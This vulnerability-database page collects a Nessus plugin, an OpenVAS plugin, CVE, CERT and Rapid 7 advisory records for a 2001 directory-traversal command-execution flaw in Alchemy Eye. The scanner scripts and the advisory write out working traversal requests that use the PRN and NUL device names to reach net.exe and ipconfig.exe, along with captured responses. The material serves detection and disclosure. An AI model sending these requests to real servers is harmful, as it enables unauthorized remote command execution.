ID ALCHEMY_EYE_HTTP.NASL Type nessus Reporter This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu ) Modified 2001-12-03T00:00:00
Description
Alchemy Eye and Alchemy Network Monitor are network management tools
for Microsoft Windows. The product contains a built-in HTTP server for
remote monitoring and control. This HTTP server allows arbitrary
commands to be run on the server by a remote attacker.
#%NASL_MIN_LEVEL 70300
#
# This script was written by Drew Hintz ( http://guh.nu )
#
# It is based on scripts written by Renaud Deraison and HD Moore
#
# See the Nessus Scripts License for details
#
# Changes by Tenable:
# - Description whitespace touch-up, added see-also (3/15/10)
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(10818);
script_version("1.27");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2001-0871");
script_bugtraq_id(3599);
script_name(english:"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution");
script_summary(english:"Determine if arbitrary commands can be executed by Alchemy Eye");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a remote command execution
vulnerability.");
script_set_attribute(attribute:"description", value:
"Alchemy Eye and Alchemy Network Monitor are network management tools
for Microsoft Windows. The product contains a built-in HTTP server for
remote monitoring and control. This HTTP server allows arbitrary
commands to be run on the server by a remote attacker.");
script_set_attribute(attribute:"see_also", value:"http://www.rapid7.com/security-center/advisories/R7-0001.jsp");
script_set_attribute(attribute:"solution", value:
"Either disable HTTP access in Alchemy Eye, or require authentication
for Alchemy Eye. Both of these can be set in the Alchemy Eye
preferences.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2001/11/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2001/12/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu )");
script_family(english:"CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl");
script_require_keys("www/alchemy");
script_require_ports("Services/www", 80);
exit(0);
}
#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80, embedded:TRUE);
if(!get_port_state(port))exit(0);
function check(req)
{
local_var r, pat;
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req);
if ( r == NULL ) exit(0);
pat = "ACCOUNTS | COMPUTER";
if(pat >< r) {
security_hole(port:port);
exit(0);
}
return(0);
}
dir[0] = "/PRN";
dir[1] = "/NUL";
dir[2] = "";
for(d=0;dir[d];d=d+1)
{
url = string("/cgi-bin", dir[d], "/../../../../../../../../WINNT/system32/net.exe");
check(req:url);
}
{"id": "ALCHEMY_EYE_HTTP.NASL", "bulletinFamily": "scanner", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "description": "Alchemy Eye and Alchemy Network Monitor are network management tools\nfor Microsoft Windows. The product contains a built-in HTTP server for\nremote monitoring and control. This HTTP server allows arbitrary\ncommands to be run on the server by a remote attacker.", "published": "2001-12-03T00:00:00", "modified": "2001-12-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/10818", "reporter": "This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu )", "references": ["http://www.rapid7.com/security-center/advisories/R7-0001.jsp"], "cvelist": ["CVE-2001-0871"], "type": "nessus", "lastseen": "2021-01-20T09:23:59", "edition": 17, "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0871"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231010818"]}, {"type": "cert", "idList": ["VU:220715"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:2234"]}, {"type": "osvdb", "idList": ["OSVDB:684"]}], "modified": "2021-01-20T09:23:59", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-01-20T09:23:59", "rev": 2}, "vulnersScore": 7.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Drew Hintz ( http://guh.nu )\n#\n# It is based on scripts written by Renaud Deraison and HD Moore\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Description whitespace touch-up, added see-also (3/15/10)\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(10818);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2001-0871\");\n script_bugtraq_id(3599);\n\n script_name(english:\"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution\");\n script_summary(english:\"Determine if arbitrary commands can be executed by Alchemy Eye\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Alchemy Eye and Alchemy Network Monitor are network management tools\nfor Microsoft Windows. The product contains a built-in HTTP server for\nremote monitoring and control. This HTTP server allows arbitrary\ncommands to be run on the server by a remote attacker.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/security-center/advisories/R7-0001.jsp\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable HTTP access in Alchemy Eye, or require authentication\nfor Alchemy Eye. Both of these can be set in the Alchemy Eye\npreferences.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2001-2021 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(english:\"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/alchemy\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\n\nif(!get_port_state(port))exit(0);\n\nfunction check(req)\n{\n local_var r, pat;\n\n req = http_get(item:req, port:port);\n r = http_keepalive_send_recv(port:port, data:req);\n if ( r == NULL ) exit(0);\n pat = \"ACCOUNTS | COMPUTER\";\n if(pat >< r) {\n \tsecurity_hole(port:port);\n\texit(0);\n \t}\n return(0);\n}\n\ndir[0] = \"/PRN\";\ndir[1] = \"/NUL\";\ndir[2] = \"\";\n\nfor(d=0;dir[d];d=d+1)\n{\n\turl = string(\"/cgi-bin\", dir[d], \"/../../../../../../../../WINNT/system32/net.exe\");\n\tcheck(req:url);\n}\n", "naslFamily": "CGI abuses", "pluginID": "10818", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:19:25", "description": "Directory traversal vulnerability in HTTP server for Alchemy Eye and Alchemy Network Monitor allows remote attackers to execute arbitrary commands via an HTTP request containing (1) a .. in versions 2.0 through 2.6.18, or (2) a DOS device name followed by a .. in versions 2.6.19 through 3.0.10.", "edition": 5, "cvss3": {}, "published": "2001-12-21T05:00:00", "title": "CVE-2001-0871", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0871"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:alchemy_lab:alchemy_eye:2.6", "cpe:/a:alchemy_lab:alchemy_eye:2.0", "cpe:/a:alchemy_lab:alchemy_eye:2.6.19", "cpe:/a:alchemy_lab:alchemy_eye:3.0", "cpe:/a:alchemy_lab:alchemy_eye:2.4", "cpe:/a:alchemy_lab:alchemy_eye:2.1", "cpe:/a:alchemy_lab:alchemy_eye:2.3", "cpe:/a:alchemy_lab:alchemy_eye:2.2", "cpe:/a:alchemy_lab:alchemy_eye:2.6.18", "cpe:/a:dek_software:alchemy_network_monitor:3.0.10", "cpe:/a:alchemy_lab:alchemy_eye:2.5", "cpe:/a:alchemy_lab:alchemy_eye:3.0.10"], "id": "CVE-2001-0871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0871", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:alchemy_lab:alchemy_eye:2.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.6.18:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:dek_software:alchemy_network_monitor:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:alchemy_lab:alchemy_eye:2.2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:08:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0871"], "description": "Alchemy Eye and Alchemy Network Monitor are network management\n tools for Microsoft Windows. The product contains a built-in HTTP\n server for remote monitoring and control. This HTTP server allows\n arbitrary commands to be run on the server by a remote attacker.", "modified": "2020-05-08T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010818", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010818", "type": "openvas", "title": "Alchemy Eye HTTP Command Execution", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Description: Alchemy Eye HTTP Command Execution\n#\n# Authors:\n# Drew Hintz ( http://guh.nu )\n# Based on scripts written by Renaud Deraison and HD Moore\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10818\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3599);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0871\");\n script_name(\"Alchemy Eye HTTP Command Execution\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_alchemy_eye_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"alchemy_eye/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/243404\");\n\n script_tag(name:\"summary\", value:\"Alchemy Eye and Alchemy Network Monitor are network management\n tools for Microsoft Windows. The product contains a built-in HTTP\n server for remote monitoring and control. This HTTP server allows\n arbitrary commands to be run on the server by a remote attacker.\");\n\n script_tag(name:\"solution\", value:\"Either disable HTTP access in Alchemy Eye, or require\n authentication for Alchemy Eye. Both of these can be set in the Alchemy Eye preferences.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nforeach dir( make_list( \"/PRN\", \"/NUL\", \"\" ) ) {\n\n url = string(\"/cgi-bin\", dir, \"/../../../../../../../../WINNT/system32/net.exe\");\n\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req );\n if(!res)\n continue;\n\n if( \"ACCOUNTS | COMPUTER\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:44:20", "bulletinFamily": "info", "cvelist": ["CVE-2001-0871"], "description": "### Overview \n\nAlchemy Eye does not properly validate HTTP requests, allowing arbitrary command execution.\n\n### Description \n\nAlchemy Eye includes an HTTP server for remote system monitoring and control. In versions 2.0 through 2.6 of Alchemy Eye, the HTTP server component does not adequately validate HTTP requests, allowing attackers to execute arbitrary commands. \n \n--- \n \n### Impact \n\nRemote attackers can execute arbitrary commands on the server. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of a practical solution to this problem. \n \n--- \n \n### Vendor Information\n\n220715\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Alchemy Lab Affected\n\nUpdated: September 25, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220715 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.rapid7.com/advisories/R7-0001.txt>\n * <http://www.securityfocus.com/bid/3599>\n * <http://www.alchemy-lab.com/products/eye/>\n * <http://www.deksoftware.com/alchemy/>\n\n### Acknowledgements\n\nThanks to Rapid 7 for reporting this vulnerability.\n\nThis document was written by Shawn Van Ittersum.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0871](<http://web.nvd.nist.gov/vuln/detail/CVE-2001-0871>) \n---|--- \n**Severity Metric:** | 6.50 \n**Date Public:** | 2001-11-29 \n**Date First Published:** | 2002-09-27 \n**Date Last Updated: ** | 2003-09-18 20:14 UTC \n**Document Revision: ** | 6 \n", "modified": "2003-09-18T20:14:00", "published": "2002-09-27T00:00:00", "id": "VU:220715", "href": "https://www.kb.cert.org/vuls/id/220715", "type": "cert", "title": "Alchemy Eye HTTP Server does not adequately validate user input thereby allowing remote command execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:05", "bulletinFamily": "software", "cvelist": ["CVE-2001-0871"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n_______________________________________________________________________\r\n Rapid 7, Inc. Security Advisory\r\n\r\n Visit http://www.rapid7.com to download NeXpose(tm), our\r\n advanced vulnerability scanner. Linux and Windows 2000\r\n versions are available now!\r\n_______________________________________________________________________\r\n\r\nRapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution\r\n\r\n Published: November 29, 2001\r\n Revision: 1.0\r\n CVE ID: CAN-2001-0871\r\n Bugtraq ID: 3599\r\n\r\n1. Affected system(s):\r\n\r\n KNOWN VULNERABLE:\r\n o Alchemy Eye and Alchemy Network Monitor v2.0 through v2.6.18\r\n (vulnerable to first variant, see below)\r\n o Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10\r\n (vulnerable to second variant, see below)\r\n\r\n Apparently NOT VULNERABLE:\r\n o Alchemy Eye v1.7 (has no web access feature)\r\n o Alchemy Eye v1.8 (has no web access feature)\r\n\r\n2. Summary\r\n\r\n Alchemy Eye and Alchemy Network Monitor are network management\r\n tools for Microsoft Windows. The product contains a built-in HTTP\r\n server for remote monitoring and control. This HTTP server allows\r\n arbitrary commands to be run on the server by a remote\r\n attacker.\r\n\r\n The Common Vulnerabilities and Exposures (CVE) project has assigned\r\n the identifier CAN-2001-0871 to this issue. This is a candidate for\r\n inclusion in the CVE list (http://cve.mitre.org), which standardizes\r\n names for security problems.\r\n\r\n Bugtraq has assigned the identifier 3599 to this vulnerability.\r\n More information on Bugtraq can be found at http://www.securityfocus.com\r\n\r\n3. Vendor status and information\r\n\r\n Alchemy Eye\r\n Alchemy Labs, Inc.\r\n http://www.alchemy-lab.com/products/eye/\r\n\r\n Alchemy Network Monitor\r\n DEK Software, Inc.\r\n http://www.deksoftware.com/alchemy/\r\n\r\n Vendors notified 7/25/2001. Initial problem fixed shortly thereafter\r\n but subsequent releases (up to and including the current release,\r\n v3.0.10) are still vulnerable to a variant of the same attack.\r\n Vendor is aware of the problems but has stopped responding to\r\n our emails.\r\n\r\n4. Solution\r\n\r\n The current version of the product is VULNERABLE. Future versions may\r\n also be vulnerable. If you are using any of the vulnerable versions,\r\n we suggest the following:\r\n\r\n (a) Disable HTTP access completely via Preferences. You must\r\n restart the product for this to take effect.\r\n\r\n or, (b) Require HTTP authentication via Preferences. You must\r\n restart the product for this to take effect. This is only possible\r\n with versions 2.6.x and later (earlier versions have no\r\n authentication option).\r\n\r\n (c) Create a very restricted user account and run the product under\r\n those credentials.\r\n\r\n5. Detailed analysis\r\n\r\n Versions 2.x through 2.6 are vulnerable to arbitrary remote command\r\n execution by using a simple dotdot traversal.\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 200 OK\r\n Date: Thu, 29 Nov 2001 18:20:00 GMT\r\n Server: Alchemy Eye/2.0.20\r\n MIME-version: 1.0\r\n Content-Type: text/html\r\n Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 275\r\n\r\n\r\n Windows 2000 IP Configuration\r\n\r\n Ethernet adapter Cable:\r\n\r\n Connection-specific DNS Suffix . : foo.bar.com\r\n IP Address. . . . . . . . . . . . : 192.168.0.2\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n\r\n\r\n Later patched 2.6 revisions are not vulnerable to the simple dotdot\r\n traversal:\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 403 Forbidden\r\n Server: Alchemy Eye/2.6.16\r\n MIME-version: 1.0\r\n Content-Type: text/plain\r\n Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 9\r\n\r\n Forbidden\r\n\r\n\r\n However, these versions are vulnerable to a variant that combines\r\n dotdot traversal with the special Windows device name "NUL":\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 200 OK\r\n Server: Alchemy Eye/2.6.16\r\n MIME-version: 1.0\r\n Content-Type: text/html\r\n Location: /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 275\r\n\r\n\r\n Windows 2000 IP Configuration\r\n\r\n Ethernet adapter Cable:\r\n\r\n Connection-specific DNS Suffix . : foo.bar.com\r\n IP Address. . . . . . . . . . . . : 192.168.0.2\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n\r\n\r\n Versions 2.7.x and above address the "NUL" issue but are still vulnerable\r\n if you use a device name other than "NUL", e.g. "PRN":\r\n\r\n $ telnet localhost 80\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0\r\n\r\n HTTP/1.0 200 OK\r\n Server: Alchemy Eye/3.0.10\r\n MIME-version: 1.0\r\n Content-Type: text/html\r\n Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe\r\n Content-Length: 275\r\n\r\n\r\n Windows 2000 IP Configuration\r\n\r\n Ethernet adapter Cable:\r\n\r\n Connection-specific DNS Suffix . : foo.bar.com\r\n IP Address. . . . . . . . . . . . : 192.168.0.2\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n\r\n\r\n The attacker can not run commands with arguments because\r\n the HTTP server does not handle URL-encoded spaces (%20),\r\n nor does it handle actual spaces.\r\n\r\n6. Contact Information\r\n\r\n Rapid 7 Security Advisories\r\n Email: advisory@rapid7.com\r\n Web: http://www.rapid7.com\r\n Phone: +1 (212) 558-8700\r\n\r\n7. Disclaimer and Copyright\r\n\r\n Rapid 7, Inc. is not responsible for the misuse of the information\r\n provided in our security advisories. These advisories are a service\r\n to the professional security community. There are NO WARRANTIES\r\n with regard to this information. Any application or distribution of\r\n this information constitutes acceptance AS IS, at the user's own\r\n risk. This information is subject to change without notice.\r\n\r\n This advisory Copyright (C) 2001 Rapid 7, Inc. Permission is\r\n hereby granted to redistribute this advisory in electronic media\r\n only, providing that no changes are made and that the copyright\r\n notices and disclaimers remain intact. This advisory may not be\r\n printed or distributed in non-electronic media without the\r\n express written permission of Rapid 7, Inc.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 7.0.1\r\n\r\niQEVAwUBPAcMn+stPa8cHEsJAQEZUQgAwPeHJLOusOnIN88hFPOX56efWkcliduK\r\naetWtYbPLzNKhgSxJeWEddTzZeT3i/ulwT810jQyS4nfxGlZa2JvaXMXeAwxKLXm\r\nIMXAymCbXKdP4D/SYe5/kLUeWcnujgyYz0m3Y2qmcGDjhaizm8iWxvYUPunX6/ra\r\n6fXTjQjjqRnB75sTx4FZYglvE4o0FFNNQmEvbPJXmF0No7X/KFaDAM4DD/R/H1IL\r\nC6aAed9NppY2KizzO7pf3Rd3M1kJax3xC6+8hQWYplHJZN3WQ+msNlpq/2O6D5Gg\r\ndzIi8ANkGzzrw1y4ZbYPTFvmyVE6sQTW5ShH5t69bl6iGieVtS9JIQ==\r\n=keCq\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2001-12-01T00:00:00", "published": "2001-12-01T00:00:00", "id": "SECURITYVULNS:DOC:2234", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:2234", "title": "Rapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-0871"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.alchemy-lab.com/\nSnort Signature ID: 1505\nSnort Signature ID: 1506\n[CVE-2001-0871](https://vulners.com/cve/CVE-2001-0871)\nBugtraq ID: 3599\n", "modified": "2001-11-29T00:00:00", "published": "2001-11-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:684", "id": "OSVDB:684", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
